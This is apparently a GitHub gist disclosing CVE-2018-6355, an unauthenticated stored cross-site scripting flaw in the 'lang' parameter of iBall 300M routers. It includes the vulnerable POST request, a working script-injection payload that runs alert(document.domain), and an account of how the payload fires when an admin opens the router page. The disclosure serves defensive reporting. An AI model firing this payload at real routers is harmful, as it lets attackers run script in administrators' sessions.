Created
January 30, 2018 15:27
-
-
Save MayurUdiniya/597169f582e506b610beb4e84fd8c8fc to your computer and use it in GitHub Desktop.
Stored XSS in iBall router CVE-2018-6355
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
> /goform/setLang on iBall 300M devices with "iB-WRB302N_1.0.1-Sep 8 | |
> 2017" firmware has Unauthenticated Stored Cross Site Scripting via the | |
> lang parameter. | |
> | |
> ------------------------------------------ | |
> | |
> [Additional Information] | |
> Below find the Vulnerable POST request | |
> | |
> POST /goform/setLang HTTP/1.1 | |
> Cookie: bLanguage=en | |
> | |
> lang=en";</script><script>alert(document.domain);</script> | |
> | |
> ------------------------------------------ | |
> | |
> [Vulnerability Type] | |
> Cross Site Scripting (XSS) | |
> | |
> ------------------------------------------ | |
> | |
> [Vendor of Product] | |
> iBall | |
> | |
> ------------------------------------------ | |
> | |
> [Affected Product Code Base] | |
> 300M 2-Port Wireless-N Broadband Router - iB-WRB302N_1.0.1-Sep 8 2017 | |
> | |
> ------------------------------------------ | |
> | |
> [Affected Component] | |
> iBall 300M 2-Port Wireless-N Broadband Router is affected by Stored Cross Site | |
> Scripting - "lang" parameter is vulnerable for XSS | |
> | |
> ------------------------------------------ | |
> | |
> [Attack Type] | |
> Local | |
> | |
> ------------------------------------------ | |
> | |
> [Impact Code execution] | |
> true | |
> | |
> ------------------------------------------ | |
> | |
> [Impact Denial of Service] | |
> true | |
> | |
> ------------------------------------------ | |
> | |
> [Impact Information Disclosure] | |
> true | |
> | |
> ------------------------------------------ | |
> | |
> [Attack Vectors] | |
> An unauthenticated attacker will set lang parameter to | |
> "lang=en";</script><script>alert(document.domain);</script>" - the | |
> JavaScript will be stored in the router homepage. Whenever an admin goes | |
> to the router gateway (i.e., 192.168.1.1), stored XSS will execute. | |
> | |
> ------------------------------------------ | |
> | |
> [Discoverer] | |
> Mayur Udiniya |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment